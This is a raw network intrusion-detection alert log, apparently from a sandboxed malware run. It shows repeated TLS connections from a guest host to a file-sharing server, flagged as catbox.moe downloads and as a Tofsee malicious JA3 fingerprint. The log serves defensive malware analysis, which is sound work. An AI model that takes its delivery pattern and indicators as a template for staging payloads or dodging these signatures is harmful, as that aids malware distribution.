TCP 192.168.56.101:49355 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49280 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49376 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49280 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49319 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49376 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49298 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49280 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49376 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49298 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49298 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49358 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49321 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49358 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49321 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49296 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49377 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49358 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49321 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49296 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49377 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49300 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49300 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49296 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49377 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49300 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49326 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49361 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49326 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49361 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49386 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49297 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49326 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49386 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49361 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49304 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49304 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49297 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49386 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49304 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49297 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49330 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49364 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49330 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49364 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49399 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49399 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49330 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49301 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49364 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49301 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49399 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49318 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49318 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49301 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49332 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49318 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49301 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49332 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49402 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49366 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49332 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49402 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49366 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49402 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49366 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49336 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49303 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49336 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49303 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49337 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49337 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49336 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49303 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49406 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49406 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49337 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49406 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49349 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49305 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49349 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49373 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49305 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49348 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49373 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49348 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49349 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49410 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49305 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49410 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49373 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49348 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49410 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49356 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49308 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49356 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49308 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49374 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49350 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49374 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49356 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49350 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49413 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49308 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49413 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49374 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49350 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49413 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49371 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49310 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49371 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49310 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49390 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49351 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49419 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49371 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49351 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49390 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49310 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49419 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49351 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49390 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49419 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49372 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49372 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49314 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49314 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49352 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49424 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49372 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49314 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49424 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49352 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49391 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49391 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49424 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49352 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49391 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49383 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49324 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49383 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49324 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49426 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49426 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49324 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49411 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49365 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49411 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49383 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49426 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49365 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49411 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49365 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49328 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49328 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49385 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49428 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49385 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49328 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49416 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49428 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49382 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49416 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49382 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49385 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49428 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49416 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49382 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49335 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49335 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49392 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49429 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49335 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49392 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49436 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49429 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49393 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49436 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49393 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49392 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49429 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49436 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49393 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49339 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49339 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49396 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49339 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49448 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49396 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49414 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49448 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49433 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49414 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
